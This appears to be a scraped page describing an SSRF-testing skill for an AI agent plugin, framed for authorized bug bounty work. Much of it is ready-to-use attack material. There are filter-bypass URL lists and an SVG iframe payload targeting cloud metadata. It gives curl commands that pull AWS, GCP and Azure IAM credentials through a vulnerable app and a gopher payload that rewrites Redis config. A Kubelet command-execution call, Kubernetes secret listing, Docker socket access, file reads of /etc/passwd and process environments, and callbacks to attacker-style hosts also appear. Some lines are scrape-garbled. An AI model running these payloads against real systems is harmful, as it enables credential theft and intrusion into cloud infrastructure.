From cybersec-toolkit
SSRF testing checklist covering discovery, blind SSRF with out-of-band, cloud metadata endpoints (AWS/GCP/Azure), filter bypass techniques (IP encoding, DNS rebinding, redirect chains), and SSRF to RCE escalation. For authorized security research and bug bounty.
How this skill is triggered — by the user, by Claude, or both
Slash command
/cybersec-toolkit:offensive-ssrfThe summary Claude sees in its skill listing — used to decide when to auto-load this skill
- **Skill Name**: ssrf
Server-Side Request Forgery testing checklist: SSRF discovery, blind SSRF with out-of-band, cloud metadata endpoints (AWS/GCP/Azure), SSRF filter bypass techniques (IP encoding, DNS rebinding, redirect chains), and SSRF to RCE escalation. Use for web app SSRF testing and bug bounty.
Use this skill when the conversation involves any of:
SSRF, server-side request forgery, blind SSRF, cloud metadata, AWS metadata, GCP metadata, SSRF bypass, DNS rebinding, redirect chain, SSRF RCE, internal port scan
When this skill is active:
flowchart LR
A[Identify SSRF Vectors] --> B[Setup Callback Listener]
B --> C[Test Internal Addresses]
C --> D{Response Contains\nInternal Data?}
D -->|Yes| E[Basic SSRF Confirmed]
D -->|No| F[Check Callback\nListener Logs]
F --> G{Callbacks\nReceived?}
G -->|Yes| H[Blind SSRF Confirmed]
G -->|No| I[Try Bypass Techniques]
I --> J[Retest with Bypasses]
E --> K[Escalate SSRF]
H --> K
J --> D
Server-Side Request Forgery (SSRF) is a vulnerability that allows attackers to induce a server-side application to make requests to an unintended location. In a successful SSRF attack, the attacker can force the server to connect to:
graph TD
A[Attacker] -->|Sends crafted request| B[Vulnerable Web App]
B -->|Makes request to| C[Unintended Target]
C -->|Responds with data| B
B -->|Includes response data| A
subgraph "Possible Targets"
C
D[Internal Network Services]
E[Cloud Metadata Service]
F[External Web Services]
G[Local Services on Same Server]
end
C --- D
C --- E
C --- F
C --- G
Types of SSRF include:
URL Input Fields:
Proxy Functionality:
File Processing:
Integration Points:
mindmap
root((SSRF Vectors))
URL Input Fields
Website Previews
URL Imports
API Integrations
Webhooks
PDF/Screenshot Export
Proxy Functionality
Web Proxies
Content Fetchers
API Gateways
Translation Services
File Processing
Media Converters
Document Processors
XML/JSON Processors
Integration Points
Third-party Services
Cloud Storage
Monitoring Systems
Webhook Endpoints
http://localhost:port
http://127.0.0.1:port
http://0.0.0.0:port
http://internal-service.local
http://169.254.169.254/ (cloud metadata)
sequenceDiagram
participant Attacker
participant WebApp as Vulnerable Web App
participant Internal as Internal Services
participant CallbackServer as Attacker's Callback Server
Note over Attacker,CallbackServer: Phase 1: Basic SSRF Testing
Attacker->>WebApp: Request with Internal URL<br>(http://localhost:8080)
WebApp->>Internal: Makes request to internal service
Internal->>WebApp: Response from internal service
WebApp->>Attacker: Leaked internal response
Note over Attacker,CallbackServer: Phase 2: Blind SSRF Testing
Attacker->>WebApp: Request with Callback URL<br>(http://attacker-server.com/unique-id)
WebApp->>CallbackServer: Makes request to callback server
CallbackServer->>Attacker: Log notification of request
Note over Attacker,CallbackServer: Phase 3: Bypass Testing
Attacker->>WebApp: Request with Obfuscated URL<br>(http://127.0.0.1.attacker.com)
WebApp->>CallbackServer: Makes request due to parser confusion
CallbackServer->>Attacker: Log notification of successful bypass
https://allowed-domain.com/redirect?url=http://internal-server
https://[email protected]http://127.0.0.1/
http://127.1/
http://0177.0.0.1/
http://0x7f.0.0.1/
http://2130706433/ (decimal representation)
http://[::1]/
http://[::127.0.0.1]/
http://[0:0:0:0:0:ffff:127.0.0.1]/
http://localhost.evil.com/ (when attacker controls evil.com DNS)
http://spoofed-domain/ (with modified /etc/hosts)
http://127.0.0.1/ → http://127%2e0%2e0%2e1/
http://localhost/ → http://%6c%6f%63%61%6c%68%6f%73%74/
http://LoCaLhOsT/http:////localhost/flowchart TD
A[SSRF Protection Bypass] --> B[Allowlist Bypass]
A --> C[Denylist Bypass]
B --> B1[Open Redirects]
B --> B2[DNS Spoofing]
B --> B3[Subdomain Takeover]
B --> B4[Path Traversal]
C --> C1[IP Representation Tricks]
C1 --> C1a[Decimal: 2130706433]
C1 --> C1b[Octal: 0177.0.0.1]
C1 --> C1c[Hex: 0x7f.0.0.1]
C1 --> C1d[Shortened: 127.1]
C --> C2[IPv6 Variations]
C2 --> C2a["[::1]"]
C2 --> C2b["[::127.0.0.1]"]
C --> C3[Domain Tricks]
C3 --> C3a[localhost.evil.com]
C3 --> C3b[spoofed-domain]
C --> C4[Encoding Tricks]
C4 --> C4a[URL Encoding]
C4 --> C4b[Double Encoding]
C --> C5[Schema Confusion]
C5 --> C5a["http:////localhost"]
style A fill:#f96,stroke:#333,stroke-width:2px,color:#333
style B fill:#aae,stroke:#333,color:#333
style C fill:#aae,stroke:#333,color:#333
http://100.100.100.200/latest/meta-data/https://metadata.packet.net/userdatahttp://169.254.170.2/v2/credentials/http://169.254.169.254/openstack/latest/meta_data.jsonhttp://127.1.1.1:80\@127.2.2.2:80/
http://127.1.1.1:80\@@127.2.2.2:80/
http://127.1.1.1:80:\@@127.2.2.2:80/
0://evil.com:80;http://google.com:80/
http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ
Host: or X-Forwarded-Host:) against permissive back-end proxieshttps://dns.google/resolve?name=…) to leak internal hostnamesWhen SSRF occurs in PDF rendering functionality, SVG can be used to exploit it:
<svg xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" class="highcharts-root" width="800" height="500">
<g>
<foreignObject width="800" height="500">
<body xmlns="http://www.w3.org/1999/xhtml">
<iframe src="http://169.254.169.254/latest/meta-data/" width="800" height="500"></iframe>
</body>
</foreignObject>
</g>
</svg>
http://%32%31%36%2e%35%38%2e%32%31%34%2e%32%32%37
http://%73%68%6d%69%6c%6f%6e%2e%63%6f%6d
http://0330.072.0326.0343
http://033016553343
http://0x0NaN0NaN
http://0xNaN.0xaN0NaN
http://0xNaN.0xNa0x0NaN
http://shmilon.0xNaN.undefined.undefined
http://NaN
http://0NaN
http://0NaN.0NaN
http://169.254.169.254/latest/meta-data/ (IMDSv2 is now default; first acquire a session token with PUT /latest/api/token and include it in X-aws-ec2-metadata-token)AWS IMDSv2 Session Token Bypass Techniques:
Many SSRF filters block 169.254.169.254 but miss the two-step IMDSv2 flow:
# Step 1: Obtain session token (requires PUT request)
PUT http://169.254.169.254/latest/api/token
X-aws-ec2-metadata-token-ttl-seconds: 21600
# If application supports PUT via SSRF parameter:
# Example 1: Via parameter that accepts methods
POST /api/fetch
{
"url": "http://169.254.169.254/latest/api/token",
"method": "PUT",
"headers": {"X-aws-ec2-metadata-token-ttl-seconds": "21600"}
}
# Example 2: Via URL scheme that triggers PUT
http://vulnerable.com/proxy?url=http://169.254.169.254/latest/api/token&method=PUT
# Step 2: Use token to access metadata
GET http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE
X-aws-ec2-metadata-token: <TOKEN_FROM_STEP1>
IMDSv2 Bypass Scenarios:
X-HTTP-Method-Override: PUT)http://169.254.169.254/metadata/instance (requires header Metadata: true and api-version; alternate IP http://168.63.129.16/metadata/instance)http://169.254.169.254/metadata/v1.jsonhttp://169.254.169.254/metadata (legacy metadata.packet.net now redirects here)http://metadata.google.internal/computeMetadata/v1/http://169.254.169.254/opc/v1/instance/http://localhost:8080/adminhttp://localhost:3306, http://localhost:27017http://localhost:6379 (Redis)http://localhost:8500 (Consul)http://localhost:3000, http://localhost:8000file:///etc/passwddict://localhost:6379/infogopher://localhost:25/tftp://localhost:69/ldap://localhost:389/PRI * HTTP/2.0) may slip past scheme filtershttp://[::ffff:127.0.0.1] and http://[::ffff:7f00:1]http://[fe80::1%25lo0]:80 may confuse naive validatorsgraph TB
A[SSRF Vulnerability]
A --> B[Cloud Metadata<br>Exploitation]
A --> C[Internal Service<br>Access]
A --> D[Protocol<br>Abuse]
B --> B1["AWS: 169.254.169.254"]
B --> B2["GCP: metadata.google.internal"]
B --> B3["Azure: 169.254.169.254/metadata"]
C --> C1["Admin: localhost:8080/admin"]
C --> C2["DB: localhost:3306, 27017"]
C --> C3["Cache: localhost:6379"]
C --> C4["DevSrv: localhost:3000, 8000"]
D --> D1["file:///etc/passwd"]
D --> D2["dict://localhost:6379"]
D --> D3["gopher://localhost:25"]
D --> D4["ldap://localhost:389"]
style A fill:#b7b,stroke:#333,stroke-width:2px,color:#333
style B fill:#aae,stroke:#333,color:#333
style C fill:#aae,stroke:#333,color:#333
style D fill:#aae,stroke:#333,color:#333
url, dest, redirect, uri, path, continue, window, next, data, reference,
site, html, val, validate, domain, callback, return, page, feed, host,
port, to, out, view, dir, origin, source, endpoint, proxy, fetch, img_url
link, site_url, media_url
graph TD
A[Start SSRF Testing] --> B[Initial Discovery]
B --> B1[Map Entry Points]
B --> B2[Setup OOB Detection]
B --> B3[Test External URLs]
B --> B4[Analyze Responses]
B4 --> C{Potential SSRF?}
C -->|Yes| D[Vulnerability Confirmation]
C -->|No| E[Test Different Parameters]
E --> B4
D --> D1[Test Internal Resources]
D --> D2[Test Blind SSRF]
D --> D3[Test Protocol Support]
D3 --> F{Vulnerability Confirmed?}
F -->|Yes| G[Exploitation]
F -->|No| H[Test Bypass Techniques]
H --> D1
G --> G1[Port Scanning]
G --> G2[Cloud Metadata Access]
G --> G3[Protocol-Specific Exploitation]
G --> G4[File Access]
G4 --> I[Documentation/Reporting]
style A fill:#f9f,stroke:#333,stroke-width:2px,color:#333
style C fill:#ff9,stroke:#333,stroke-width:2px,color:#333
style F fill:#ff9,stroke:#333,stroke-width:2px,color:#333
style I fill:#9f9,stroke:#333,stroke-width:2px,color:#333
https://your-server.com/ssrf-test)Test access to common internal resources:
http://localhost/
http://127.0.0.1:22/
http://127.0.0.1:3306/
http://169.254.169.254/
Test for blind SSRF using time delays:
http://slowwly.robertomurray.co.uk/delay/5000/url/http://www.google.com
Confirm protocol support:
file:///etc/passwd
gopher://localhost:25/xHELO%20localhost
Port Scanning:
for port in {1..65535}; do
curl -s "https://target.com/api?url=http://localhost:$port" -o /dev/null
if [ $? -eq 0 ]; then echo "Port $port is open"; fi
done
Cloud Metadata Access:
# AWS
# IMDSv2 requires first fetching a token
curl -s -X PUT "https://target.com/api?url=http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"
# then include it
curl -s "https://target.com/api?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE" -H "X-aws-ec2-metadata-token: TOKEN"
# Then query the specific role
curl -s "https://target.com/api?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME"
# GCP
curl -s "https://target.com/api?url=http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google"
# Azure
curl -s "https://target.com/api?url=http://169.254.169.254/metadata/instance?api-version=2021-02-01" -H "Metadata: true"
Gopher Protocol Exploitation (Redis example):
gopher://127.0.0.1:6379/_SET%20ssrfkey%20%22Hello%20SSRF%22%0D%0ACONFIG%20SET%20dir%20%2Ftmp%2F%0D%0ACONFIG%20SET%20dbfilename%20redis.dump%0D%0ASAVE%0D%0AQUIT
File Access:
file:///etc/passwd
file:///proc/self/environ
file:///var/www/html/config.php
Test IP representation variations:
http://127.0.0.1/
http://2130706433/
http://0x7f.0.0.1/
http://017700000001/
Test with URL encoding:
http://127.0.0.1/ → http://127%2e0%2e0%2e1/
Test with open redirects:
https://allowed-domain.com/redirect?url=http://internal-server
Test DNS rebinding with modern tools:
Modern DNS Rebinding Tools:
make-<ip1>-<ip2>-rbndr.us)Example usage:
# Using rbndr.us: first resolves to your server, then to internal IP
curl http://make-1.2.3.4-127.0.0.1-rbndr.us
# Using 1u.ms
curl http://1u.ms/A-127.0.0.1:1-2 # Alternates between external and localhost
# From SSRF vantage point:
# 1. Kubelet API (often unauthenticated or weakly authenticated)
curl http://127.0.0.1:10250/pods # List all pods on node
curl http://127.0.0.1:10250/run/<namespace>/<pod>/<container> -d "cmd=id" # Execute commands
curl http://127.0.0.1:10255/pods # Read-only port (legacy, often still open)
# 2. Extract service account token
curl file:///var/run/secrets/kubernetes.io/serviceaccount/token
# Or via SSRF
http://vulnerable-app?url=file:///var/run/secrets/kubernetes.io/serviceaccount/token
# 3. Use service account to access Kubernetes API
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
curl -H "Authorization: Bearer $TOKEN" \
https://kubernetes.default.svc/api/v1/namespaces/default/pods
# 4. List secrets
curl -H "Authorization: Bearer $TOKEN" \
https://kubernetes.default.svc/api/v1/namespaces/default/secrets
Istio/Envoy:
# Envoy admin interface (often exposed on localhost)
http://127.0.0.1:15000/config_dump # Full mesh configuration, certificates, endpoints
http://127.0.0.1:15000/clusters # Upstream services and health
http://127.0.0.1:15000/stats # Detailed metrics
http://127.0.0.1:15000/certs # TLS certificates
http://127.0.0.1:15001/ # Envoy admin on alternative port
# Pilot discovery service
http://127.0.0.1:8080/debug/endpointz # Service endpoints
http://127.0.0.1:8080/debug/configz # Pilot configuration
Linkerd:
# Linkerd proxy admin
http://127.0.0.1:4191/metrics # Prometheus metrics (leaks service topology)
http://127.0.0.1:4191/ready # Readiness endpoint
http://127.0.0.1:4140/ # Inbound proxy admin
Consul Connect:
http://127.0.0.1:8500/v1/agent/self # Agent configuration
http://127.0.0.1:8500/v1/catalog/services # Service catalog
# Docker socket (if mounted - common in CI/CD containers)
# Via SSRF translate unix socket to HTTP
unix:///var/run/docker.sock
# Example: List containers
curl --unix-socket /var/run/docker.sock http://localhost/v1.40/containers/json
# Via SSRF (if application supports unix sockets):
http://vulnerable-app?url=unix:///var/run/docker.sock:/v1.40/containers/json
# containerd socket
unix:///run/containerd/containerd.sock
# CRI-O socket
unix:///var/run/crio/crio.sock
# ECS Task Metadata Endpoint (AWS ECS/Fargate)
http://169.254.170.2/v2/metadata # Task metadata
http://169.254.170.2/v2/credentials # IAM credentials for task role
http://169.254.170.2/v2/stats # Task stats
http://169.254.170.2/v3/ # v3 endpoint
# GCP Cloud Run metadata
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
# Requires header: Metadata-Flavor: Google
# Azure Container Instances
http://169.254.169.254/metadata/instance?api-version=2021-02-01
# Requires header: Metadata: true
# Kubernetes Dashboard (if exposed internally)
http://kubernetes-dashboard.kube-system.svc.cluster.local
# Prometheus
http://prometheus.monitoring.svc.cluster.local:9090/api/v1/query?query=up
# Grafana
http://grafana.monitoring.svc.cluster.local:3000
# ArgoCD
http://argocd-server.argocd.svc.cluster.local
# Rancher
http://rancher.cattle-system.svc.cluster.local
PUT /latest/api/token) for workloads that do not need EC2 metadataHost header match on every new TLS connection to mitigate HTTP/2 coalescinghttp-proxy misconfigurationsrequest module vulnerabilitiesrequests library security considerationsurllib parsing inconsistenciesURLConnection security practicesnpx claudepluginhub 26zl/cybersec-toolkit --plugin cybersec-toolkitHunts SSRF vulnerabilities using techniques from 15 public bug bounty reports covering AWS/GCP/Azure metadata, DNS rebinding, gopher-to-Redis RCE, and link-preview SSRF. Mandatory OOB confirmation for blind cases.
Guides SSRF penetration testing in web apps: identifies URL input risks, exploits internal/cloud metadata access, blind SSRF via OOB, bypasses like IP tricks/DNS rebinding, checklists, and impact evaluation.
Identifies and exploits SSRF vulnerabilities to access internal services, cloud metadata, and restricted resources during authorized penetration tests.